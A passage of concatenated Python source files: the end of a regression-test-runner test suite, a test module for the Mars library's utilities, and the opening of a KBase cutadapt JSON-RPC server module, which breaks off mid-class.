args = ("--slowest", "-j2", test)
else:
args = ("--slowest", test)
output = self.run_tests(*args, exitcode=130)
self.check_executed_tests(output, test,
omitted=test, interrupted=True)
regex = ('10 slowest tests:\n')
self.check_line(output, regex)
def test_coverage(self):
# test --coverage
test = self.create_test('coverage')
output = self.run_tests("--coverage", test)
self.check_executed_tests(output, [test])
regex = (r'lines +cov% +module +\(path\)\n'
r'(?: *[0-9]+ *[0-9]{1,2}% *[^ ]+ +\([^)]+\)+)+')
self.check_line(output, regex)
def test_wait(self):
# test --wait
test = self.create_test('wait')
output = self.run_tests("--wait", test, input='key')
self.check_line(output, 'Press any key to continue')
def test_forever(self):
# test --forever
code = textwrap.dedent("""
import builtins
import unittest
class ForeverTester(unittest.TestCase):
def test_run(self):
# Store the state in the builtins module, because the test
# module is reload at each run
if 'RUN' in builtins.__dict__:
builtins.__dict__['RUN'] += 1
if builtins.__dict__['RUN'] >= 3:
self.fail("fail at the 3rd runs")
else:
builtins.__dict__['RUN'] = 1
""")
test = self.create_test('forever', code=code)
output = self.run_tests('--forever', test, exitcode=2)
self.check_executed_tests(output, [test]*3, failed=test)
def check_leak(self, code, what):
test = self.create_test('huntrleaks', code=code)
filename = 'reflog.txt'
self.addCleanup(os_helper.unlink, filename)
output = self.run_tests('--huntrleaks', '3:3:', test,
exitcode=2,
stderr=subprocess.STDOUT)
self.check_executed_tests(output, [test], failed=test)
line = 'beginning 6 repetitions\n123456\n......\n'
self.check_line(output, re.escape(line))
line2 = '%s leaked [1, 1, 1] %s, sum=3\n' % (test, what)
self.assertIn(line2, output)
with open(filename) as fp:
reflog = fp.read()
self.assertIn(line2, reflog)
@unittest.skipUnless(Py_DEBUG, 'need a debug build')
def test_huntrleaks(self):
# test --huntrleaks
code = textwrap.dedent("""
import unittest
GLOBAL_LIST = []
class RefLeakTest(unittest.TestCase):
def test_leak(self):
GLOBAL_LIST.append(object())
""")
self.check_leak(code, 'references')
@unittest.skipUnless(Py_DEBUG, 'need a debug build')
def test_huntrleaks_fd_leak(self):
# test --huntrleaks for file descriptor leak
code = textwrap.dedent("""
import os
import unittest
class FDLeakTest(unittest.TestCase):
def test_leak(self):
fd = os.open(__file__, os.O_RDONLY)
# bug: never close the file descriptor
""")
self.check_leak(code, 'file descriptors')
def test_list_tests(self):
# test --list-tests
tests = [self.create_test() for i in range(5)]
output = self.run_tests('--list-tests', *tests)
self.assertEqual(output.rstrip().splitlines(),
tests)
def test_list_cases(self):
# test --list-cases
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
""")
testname = self.create_test(code=code)
# Test --list-cases
all_methods = ['%s.Tests.test_method1' % testname,
'%s.Tests.test_method2' % testname]
output = self.run_tests('--list-cases', testname)
self.assertEqual(output.splitlines(), all_methods)
# Test --list-cases with --match
all_methods = ['%s.Tests.test_method1' % testname]
output = self.run_tests('--list-cases',
'-m', 'test_method1',
testname)
self.assertEqual(output.splitlines(), all_methods)
@support.cpython_only
def test_crashed(self):
# Any code which causes a crash
code = 'import faulthandler; faulthandler._sigsegv()'
crash_test = self.create_test(name="crash", code=code)
tests = [crash_test]
output = self.run_tests("-j2", *tests, exitcode=2)
self.check_executed_tests(output, tests, failed=crash_test,
randomize=True)
def parse_methods(self, output):
regex = re.compile("^(test[^ ]+).*ok$", flags=re.MULTILINE)
return [match.group(1) for match in regex.finditer(output)]
def test_ignorefile(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
def test_method3(self):
pass
def test_method4(self):
pass
""")
all_methods = ['test_method1', 'test_method2',
'test_method3', 'test_method4']
testname = self.create_test(code=code)
# only run a subset
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
subset = [
# only ignore the method name
'test_method1',
# ignore the full identifier
'%s.Tests.test_method3' % testname]
with open(filename, "w") as fp:
for name in subset:
print(name, file=fp)
output = self.run_tests("-v", "--ignorefile", filename, testname)
methods = self.parse_methods(output)
subset = ['test_method2', 'test_method4']
self.assertEqual(methods, subset)
def test_matchfile(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
def test_method3(self):
pass
def test_method4(self):
pass
""")
all_methods = ['test_method1', 'test_method2',
'test_method3', 'test_method4']
testname = self.create_test(code=code)
# by default, all methods should be run
output = self.run_tests("-v", testname)
methods = self.parse_methods(output)
self.assertEqual(methods, all_methods)
# only run a subset
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
subset = [
# only match the method name
'test_method1',
# match the full identifier
'%s.Tests.test_method3' % testname]
with open(filename, "w") as fp:
for name in subset:
print(name, file=fp)
output = self.run_tests("-v", "--matchfile", filename, testname)
methods = self.parse_methods(output)
subset = ['test_method1', 'test_method3']
self.assertEqual(methods, subset)
def test_env_changed(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_env_changed(self):
open("env_changed", "w").close()
""")
testname = self.create_test(code=code)
# don't fail by default
output = self.run_tests(testname)
self.check_executed_tests(output, [testname], env_changed=testname)
# fail with --fail-env-changed
output = self.run_tests("--fail-env-changed", testname, exitcode=3)
self.check_executed_tests(output, [testname], env_changed=testname,
fail_env_changed=True)
def test_rerun_fail(self):
# FAILURE then FAILURE
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_succeed(self):
return
def test_fail_always(self):
# test that always fails
self.fail("bug")
""")
testname = self.create_test(code=code)
output = self.run_tests("-w", testname, exitcode=2)
self.check_executed_tests(output, [testname],
failed=testname, rerun={testname: "test_fail_always"})
def test_rerun_success(self):
# FAILURE then SUCCESS
code = textwrap.dedent("""
import builtins
import unittest
class Tests(unittest.TestCase):
def test_succeed(self):
return
def test_fail_once(self):
if not hasattr(builtins, '_test_failed'):
builtins._test_failed = True
self.fail("bug")
""")
testname = self.create_test(code=code)
output = self.run_tests("-w", testname, exitcode=0)
self.check_executed_tests(output, [testname],
rerun={testname: "test_fail_once"})
def test_no_tests_ran(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
output = self.run_tests(testname, "-m", "nosuchtest", exitcode=0)
self.check_executed_tests(output, [testname], no_test_ran=testname)
def test_no_tests_ran_skip(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_skipped(self):
self.skipTest("because")
""")
testname = self.create_test(code=code)
output = self.run_tests(testname, exitcode=0)
self.check_executed_tests(output, [testname])
def test_no_tests_ran_multiple_tests_nonexistent(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
testname2 = self.create_test(code=code)
output = self.run_tests(testname, testname2, "-m", "nosuchtest", exitcode=0)
self.check_executed_tests(output, [testname, testname2],
no_test_ran=[testname, testname2])
def test_no_test_ran_some_test_exist_some_not(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
other_code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_other_bug(self):
pass
""")
testname2 = self.create_test(code=other_code)
output = self.run_tests(testname, testname2, "-m", "nosuchtest",
"-m", "test_other_bug", exitcode=0)
self.check_executed_tests(output, [testname, testname2],
no_test_ran=[testname])
@support.cpython_only
def test_uncollectable(self):
code = textwrap.dedent(r"""
import _testcapi
import gc
import unittest
@_testcapi.with_tp_del
class Garbage:
def __tp_del__(self):
pass
class Tests(unittest.TestCase):
def test_garbage(self):
# create an uncollectable object
obj = Garbage()
obj.ref_cycle = obj
obj = None
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
def test_multiprocessing_timeout(self):
code = textwrap.dedent(r"""
import time
import unittest
try:
import faulthandler
except ImportError:
faulthandler = None
class Tests(unittest.TestCase):
# test hangs and so should be stopped by the timeout
def test_sleep(self):
# we want to test regrtest multiprocessing timeout,
# not faulthandler timeout
if faulthandler is not None:
faulthandler.cancel_dump_traceback_later()
time.sleep(60 * 5)
""")
testname = self.create_test(code=code)
output = self.run_tests("-j2", "--timeout=1.0", testname, exitcode=2)
self.check_executed_tests(output, [testname],
failed=testname)
self.assertRegex(output,
re.compile('%s timed out' % testname, re.MULTILINE))
def test_unraisable_exc(self):
# --fail-env-changed must catch unraisable exception.
# The exception must be displayed even if sys.stderr is redirected.
code = textwrap.dedent(r"""
import unittest
import weakref
from test.support import captured_stderr
class MyObject:
pass
def weakref_callback(obj):
raise Exception("weakref callback bug")
class Tests(unittest.TestCase):
def test_unraisable_exc(self):
obj = MyObject()
ref = weakref.ref(obj, weakref_callback)
with captured_stderr() as stderr:
# call weakref_callback() which logs
# an unraisable exception
obj = None
self.assertEqual(stderr.getvalue(), '')
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", "-v", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertIn("Warning -- Unraisable exception", output)
self.assertIn("Exception: weakref callback bug", output)
def test_threading_excepthook(self):
# --fail-env-changed must catch uncaught thread exception.
# The exception must be displayed even if sys.stderr is redirected.
code = textwrap.dedent(r"""
import threading
import unittest
from test.support import captured_stderr
class MyObject:
pass
def func_bug():
raise Exception("bug in thread")
class Tests(unittest.TestCase):
def test_threading_excepthook(self):
with captured_stderr() as stderr:
thread = threading.Thread(target=func_bug)
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", "-v", testname, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertIn("Warning -- Uncaught thread exception", output)
self.assertIn("Exception: bug in thread", output)
def test_print_warning(self):
# bpo-45410: The order of messages must be preserved when -W and
# support.print_warning() are used.
code = textwrap.dedent(r"""
import sys
import unittest
from test import support
class MyObject:
pass
def func_bug():
raise Exception("bug in thread")
class Tests(unittest.TestCase):
def test_print_warning(self):
print("msg1: stdout")
support.print_warning("msg2: print_warning")
# Fail with ENV CHANGED to see print_warning() log
support.environment_altered = True
""")
testname = self.create_test(code=code)
# Expect an output like:
#
# test_threading_excepthook (test.test_x.Tests) ... msg1: stdout
# Warning -- msg2: print_warning
# ok
regex = (r"test_print_warning.*msg1: stdout\n"
r"Warning -- msg2: print_warning\n"
r"ok\n")
for option in ("-v", "-W"):
with self.subTest(option=option):
cmd = ["--fail-env-changed", option, testname]
output = self.run_tests(*cmd, exitcode=3)
self.check_executed_tests(output, [testname],
env_changed=[testname],
fail_env_changed=True)
self.assertRegex(output, regex)
def test_unicode_guard_env(self):
guard = os.environ.get(setup.UNICODE_GUARD_ENV)
self.assertIsNotNone(guard, f"{setup.UNICODE_GUARD_ENV} not set")
if guard.isascii():
# Skip to signify that the env var value was changed by the user;
# possibly to something ASCII to work around Unicode issues.
self.skipTest("Modified guard")
def test_cleanup(self):
dirname = os.path.join(self.tmptestdir, "test_python_123")
os.mkdir(dirname)
filename = os.path.join(self.tmptestdir, "test_python_456")
open(filename, "wb").close()
names = [dirname, filename]
cmdargs = ['-m', 'test',
'--tempdir=%s' % self.tmptestdir,
'--cleanup']
self.run_python(cmdargs)
for name in names:
self.assertFalse(os.path.exists(name), name)
class TestUtils(unittest.TestCase):
def test_format_duration(self):
self.assertEqual(utils.format_duration(0),
'0 ms')
self.assertEqual(utils.format_duration(1e-9),
'1 ms')
self.assertEqual(utils.format_duration(10e-3),
'10 ms')
self.assertEqual(utils.format_duration(1.5),
'1.5 sec')
self.assertEqual(utils.format_duration(1),
'1.0 sec')
self.assertEqual(utils.format_duration(2 * 60),
'2 min')
self.assertEqual(utils.format_duration(2 * 60 + 1),
'2 min 1 sec')
self.assertEqual(utils.format_duration(3 * 3600),
'3 hour')
self.assertEqual(utils.format_duration(3 * 3600 + 2 * 60 + 1),
'3 hour 2 min')
self.assertEqual(utils.format_duration(3 * 3600 + 1),
'3 hour 1 sec')
if __name__ == '__main__':
unittest.main()
|
test_utils.py
|
# -*- coding: utf-8 -*-
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import copy
import logging
import multiprocessing
import os
import shutil
import sys
import tempfile
import textwrap
import time
from concurrent.futures import ThreadPoolExecutor
from functools import partial
from io import BytesIO
from enum import Enum
import numpy as np
try:
import pandas as pd
except ImportError: # pragma: no cover
pd = None
import pytest
from .. import dataframe as md
from .. import tensor as mt
from .. import utils
from ..core import tile, TileableGraph
from ..serialization.ray import register_ray_serializers
from .core import require_ray
def test_string_conversion():
s = None
assert utils.to_binary(s) is None
assert utils.to_str(s) is None
assert utils.to_text(s) is None
s = "abcdefg"
assert isinstance(utils.to_binary(s), bytes)
assert utils.to_binary(s) == b"abcdefg"
assert isinstance(utils.to_str(s), str)
assert utils.to_str(s) == "abcdefg"
assert isinstance(utils.to_text(s), str)
assert utils.to_text(s) == "abcdefg"
ustr = type("ustr", (str,), {})
assert isinstance(utils.to_str(ustr(s)), str)
assert utils.to_str(ustr(s)) == "abcdefg"
s = b"abcdefg"
assert isinstance(utils.to_binary(s), bytes)
assert utils.to_binary(s) == b"abcdefg"
assert isinstance(utils.to_str(s), str)
assert utils.to_str(s) == "abcdefg"
assert isinstance(utils.to_text(s), str)
assert utils.to_text(s) == "abcdefg"
ubytes = type("ubytes", (bytes,), {})
assert isinstance(utils.to_binary(ubytes(s)), bytes)
assert utils.to_binary(ubytes(s)) == b"abcdefg"
s = "abcdefg"
assert isinstance(utils.to_binary(s), bytes)
assert utils.to_binary(s) == b"abcdefg"
assert isinstance(utils.to_str(s), str)
assert utils.to_str(s) == "abcdefg"
assert isinstance(utils.to_text(s), str)
assert utils.to_text(s) == "abcdefg"
uunicode = type("uunicode", (str,), {})
assert isinstance(utils.to_text(uunicode(s)), str)
assert utils.to_text(uunicode(s)) == "abcdefg"
with pytest.raises(TypeError):
utils.to_binary(utils)
with pytest.raises(TypeError):
utils.to_str(utils)
with pytest.raises(TypeError):
utils.to_text(utils)
def test_tokenize():
import shutil
import tempfile
class TestEnum(Enum):
VAL1 = "val1"
tempdir = tempfile.mkdtemp("mars_test_utils_")
try:
filename = os.path.join(tempdir, "test_npa.dat")
mmp_array = np.memmap(filename, dtype=float, mode="w+", shape=(3, 4))
mmp_array[:] = np.random.random((3, 4)).astype(float)
mmp_array.flush()
del mmp_array
mmp_array1 = np.memmap(filename, dtype=float, shape=(3, 4))
mmp_array2 = np.memmap(filename, dtype=float, shape=(3, 4))
try:
v = [
1,
2.3,
"456",
"789",
b"101112",
2147483649,
None,
np.ndarray,
[912, "uvw"],
np.arange(0, 10),
np.array(10),
np.array([b"\x01\x32\xff"]),
np.int64,
TestEnum.VAL1,
]
copy_v = copy.deepcopy(v)
assert utils.tokenize(v + [mmp_array1], ext_data=1234) == utils.tokenize(
copy_v + [mmp_array2], ext_data=1234
)
finally:
del mmp_array1, mmp_array2
finally:
shutil.rmtree(tempdir)
v = {"a", "xyz", "uvw"}
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
v = dict(x="abcd", y=98765)
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
v = dict(x=dict(a=1, b=[1, 2, 3]), y=12345)
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
# pandas relative
if pd is not None:
df = pd.DataFrame(
[[utils.to_binary("测试"), utils.to_text("数据")]],
index=["a"],
columns=["中文", "data"],
)
v = [df, df.index, df.columns, df["data"], pd.Categorical(list("ABCD"))]
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
class NonTokenizableCls:
def __getstate__(self):
raise SystemError
with pytest.raises(TypeError):
utils.tokenize(NonTokenizableCls())
class CustomizedTokenize(object):
def __mars_tokenize__(self):
return id(type(self)), id(NonTokenizableCls)
assert utils.tokenize(CustomizedTokenize()) == utils.tokenize(CustomizedTokenize())
v = lambda x: x + 1
assert utils.tokenize(v) == utils.tokenize(copy.deepcopy(v))
def f(a, b):
return np.add(a, b)
assert utils.tokenize(f) == utils.tokenize(copy.deepcopy(f))
partial_f = partial(f, 1, k=0)
partial_f2 = partial(f, 1, k=1)
assert utils.tokenize(partial_f) == utils.tokenize(copy.deepcopy(partial_f))
assert utils.tokenize(partial_f) != utils.tokenize(partial_f2)
def test_lazy_import():
old_sys_path = sys.path
mock_mod = textwrap.dedent(
"""
__version__ = '0.1.0b1'
""".strip()
)
temp_dir = tempfile.mkdtemp(prefix="mars-utils-test-")
sys.path += [temp_dir]
try:
with open(os.path.join(temp_dir, "test_mod.py"), "w") as outf:
outf.write(mock_mod)
non_exist_mod = utils.lazy_import("non_exist_mod", locals=locals())
assert non_exist_mod is None
mod = utils.lazy_import(
"test_mod", globals=globals(), locals=locals(), rename="mod"
)
assert mod is not None
assert mod.__version__ == "0.1.0b1"
glob = globals().copy()
mod = utils.lazy_import("test_mod", globals=glob, locals=locals(), rename="mod")
glob["mod"] = mod
assert mod is not None
assert mod.__version__ == "0.1.0b1"
assert type(glob["mod"]).__name__ == "module"
finally:
shutil.rmtree(temp_dir)
sys.path = old_sys_path
def test_chunks_indexer():
a = mt.ones((3, 4, 5), chunk_size=2)
a = tile(a)
assert a.chunk_shape == (2, 2, 3)
with pytest.raises(ValueError):
_ = a.cix[1]
with pytest.raises(ValueError):
_ = a.cix[1, :]
chunk_key = a.cix[0, 0, 0].key
expected = a.chunks[0].key
assert chunk_key == expected
# as chunks[9] and chunks[10] shares the same shape,
# their keys should be equal.
chunk_key = a.cix[1, 1, 1].key
expected = a.chunks[9].key
assert chunk_key == expected
chunk_key = a.cix[1, 1, 2].key
expected = a.chunks[11].key
assert chunk_key == expected
chunk_key = a.cix[0, -1, -1].key
expected = a.chunks[5].key
assert chunk_key == expected
chunk_key = a.cix[0, -1, -1].key
expected = a.chunks[5].key
assert chunk_key == expected
chunk_keys = [c.key for c in a.cix[0, 0, :]]
expected = [c.key for c in [a.cix[0, 0, 0], a.cix[0, 0, 1], a.cix[0, 0, 2]]]
assert chunk_keys == expected
chunk_keys = [c.key for c in a.cix[:, 0, :]]
expected = [
c.key
for c in [
a.cix[0, 0, 0],
a.cix[0, 0, 1],
a.cix[0, 0, 2],
a.cix[1, 0, 0],
a.cix[1, 0, 1],
a.cix[1, 0, 2],
]
]
assert chunk_keys == expected
chunk_keys = [c.key for c in a.cix[:, :, :]]
expected = [c.key for c in a.chunks]
assert chunk_keys == expected
def test_insert_reversed_tuple():
assert utils.insert_reversed_tuple((), 9) == (9,)
assert utils.insert_reversed_tuple((7, 4, 3, 1), 9) == (9, 7, 4, 3, 1)
assert utils.insert_reversed_tuple((7, 4, 3, 1), 6) == (7, 6, 4, 3, 1)
assert utils.insert_reversed_tuple((7, 4, 3, 1), 4) == (7, 4, 3, 1)
assert utils.insert_reversed_tuple((7, 4, 3, 1), 0) == (7, 4, 3, 1, 0)
def test_require_not_none():
@utils.require_not_none(1)
def should_exist():
pass
assert should_exist is not None
@utils.require_not_none(None)
def should_not_exist():
pass
assert should_not_exist is None
@utils.require_module("numpy.fft")
def should_exist_np():
pass
assert should_exist_np is not None
@utils.require_module("numpy.fft_error")
def should_not_exist_np():
pass
assert should_not_exist_np is None
def test_type_dispatcher():
dispatcher = utils.TypeDispatcher()
type1 = type("Type1", (), {})
type2 = type("Type2", (type1,), {})
type3 = type("Type3", (), {})
dispatcher.register(object, lambda x: "Object")
dispatcher.register(type1, lambda x: "Type1")
dispatcher.register("pandas.DataFrame", lambda x: "DataFrame")
assert "Type1" == dispatcher(type2())
assert "DataFrame" == dispatcher(pd.DataFrame())
assert "Object" == dispatcher(type3())
dispatcher.unregister(object)
with pytest.raises(KeyError):
dispatcher(type3())
def test_fixed_size_file_object():
arr = [str(i).encode() * 20 for i in range(10)]
bts = os.linesep.encode().join(arr)
bio = BytesIO(bts)
ref_bio = BytesIO(bio.read(100))
bio.seek(0)
ref_bio.seek(0)
fix_bio = utils.FixedSizeFileObject(bio, 100)
assert ref_bio.readline() == fix_bio.readline()
assert ref_bio.tell() == fix_bio.tell()
pos = ref_bio.tell() + 10
assert ref_bio.seek(pos) == fix_bio.seek(pos)
assert ref_bio.read(5) == fix_bio.read(5)
assert ref_bio.readlines(25) == fix_bio.readlines(25)
assert list(ref_bio) == list(fix_bio)
def test_timer():
with utils.Timer() as timer:
time.sleep(0.1)
assert timer.duration >= 0.1
def test_quiet_stdio():
old_stdout, old_stderr = sys.stdout, sys.stderr
class _IOWrapper:
def __init__(self, name=None):
self.name = name
self.content = ""
@staticmethod
def writable():
return True
def write(self, d):
self.content += d
return len(d)
stdout_w = _IOWrapper("stdout")
stderr_w = _IOWrapper("stderr")
executor = ThreadPoolExecutor(1)
try:
sys.stdout = stdout_w
sys.stderr = stderr_w
with utils.quiet_stdio():
with utils.quiet_stdio():
assert sys.stdout.writable()
assert sys.stderr.writable()
print("LINE 1", end="\n")
print("LINE 2", file=sys.stderr, end="\n")
executor.submit(print, "LINE T").result()
print("LINE 3", end="\n")
print("LINE 1", end="\n")
print("LINE 2", file=sys.stderr, end="\n")
finally:
sys.stdout, sys.stderr = old_stdout, old_stderr
assert stdout_w.content == "LINE T\nLINE 1\n"
assert stderr_w.content == "LINE 2\n"
@pytest.mark.asyncio
@pytest.mark.skipif(
sys.version_info[:2] < (3, 7),
reason="asyncio task timeout detector is not supported on python versions below 3.7",
)
async def test_asyncio_task_timeout_detector():
log_file_name = "test_asyncio_task_timeout_detector.log"
try:
os.environ["MARS_DEBUG_ASYNCIO_TASK_TIMEOUT_CHECK_INTERVAL"] = "1"
p = multiprocessing.Process(
target=_run_task_timeout_detector, args=(log_file_name,)
)
p.start()
while p.is_alive():
await asyncio.sleep(0.1)
with open(log_file_name, "r") as f:
detector_log = f.read()
assert "timeout_func" in detector_log
finally:
os.environ.pop("MARS_DEBUG_ASYNCIO_TASK_TIMEOUT_CHECK_INTERVAL")
if os.path.exists(log_file_name):
os.remove(log_file_name)
def _run_task_timeout_detector(log_file_name):
from ..utils import logger, register_asyncio_task_timeout_detector
fh = logging.FileHandler(log_file_name)
fh.setLevel(logging.INFO)
logger.addHandler(fh)
async def timeout_func():
await asyncio.sleep(2)
async def main():
task = register_asyncio_task_timeout_detector()
await asyncio.create_task(timeout_func())
task.cancel()
asyncio.run(main())
def test_module_placeholder():
required_module = utils.ModulePlaceholder("required_module")
with pytest.raises(AttributeError):
required_module()
with pytest.raises(AttributeError) as e:
required_module.method()
msg = e.value.args[0]
assert msg == "required_module is required but not installed."
def test_merge_dict():
from ..utils import merge_dict
assert merge_dict({}, {1: 2}) == {1: 2}
assert merge_dict({1: 2}, {}) == {1: 2}
assert (
merge_dict(
{"a": {1: 2}, "b": {2: 3}, "c": {1: {2: 3}}},
{"a": {1: 3}, "b": {2: 3}, "c": {1: {2: 4}}},
)
== {"a": {1: 3}, "b": {2: 3}, "c": {1: {2: 4}}}
)
with pytest.raises(ValueError):
merge_dict({"a": {1: 2}, "b": {2: 3}}, {"a": {1: 3}}, overwrite=False)
def test_flatten_dict_to_nested_dict():
from ..utils import flatten_dict_to_nested_dict
assert flatten_dict_to_nested_dict({}) == {}
with pytest.raises(ValueError):
flatten_dict_to_nested_dict({"a.b.c": 1, "a.b": 2})
assert flatten_dict_to_nested_dict({"a.b.c": 1, "a.b.d": 2}) == {
"a": {"b": {"c": 1, "d": 2}}
}
def test_readable_size():
assert utils.readable_size(32) == "32.00"
assert utils.readable_size(14354) == "14.02K"
assert utils.readable_size(14354000) == "13.69M"
assert utils.readable_size(14354000000) == "13.37G"
assert utils.readable_size(14354000000000) == "13.05T"
def test_estimate_pandas_size():
df1 = pd.DataFrame(np.random.rand(50, 10))
assert utils.estimate_pandas_size(df1) == sys.getsizeof(df1)
df2 = pd.DataFrame(np.random.rand(1000, 10))
assert utils.estimate_pandas_size(df2) == sys.getsizeof(df2)
df3 = pd.DataFrame(
{
"A": np.random.choice(["abcd", "def", "gh"], size=(1000,)),
"B": np.random.rand(1000),
"C": np.random.rand(1000),
}
)
assert utils.estimate_pandas_size(df3) != sys.getsizeof(df3)
s1 = pd.Series(np.random.rand(1000))
assert utils.estimate_pandas_size(s1) == sys.getsizeof(s1)
from ..dataframe.arrays import ArrowStringArray
array = ArrowStringArray(np.random.choice(["abcd", "def", "gh"], size=(1000,)))
s2 = pd.Series(array)
assert utils.estimate_pandas_size(s2) == sys.getsizeof(s2)
s3 = pd.Series(np.random.choice(["abcd", "def", "gh"], size=(1000,)))
assert utils.estimate_pandas_size(s3) != sys.getsizeof(s3)
idx1 = pd.MultiIndex.from_arrays(
[np.arange(0, 1000), np.random.choice(["abcd", "def", "gh"], size=(1000,))]
)
assert utils.estimate_pandas_size(idx1) != sys.getsizeof(idx1)
@require_ray
def test_web_serialize_lambda():
register_ray_serializers()
df = md.DataFrame(
mt.random.rand(10_0000, 4, chunk_size=1_0000), columns=list("abcd")
)
r = df.apply(lambda x: x)
graph = TileableGraph([r])
s = utils.serialize_serializable(graph)
f = utils.deserialize_serializable(s)
assert isinstance(f, TileableGraph)
|
kb_cutadaptServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_cutadapt.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_cutadapt'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_cutadapt.kb_cutadaptImpl import kb_cutadapt # noqa @IgnorePep8
impl_kb_cutadapt = kb_cutadapt(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
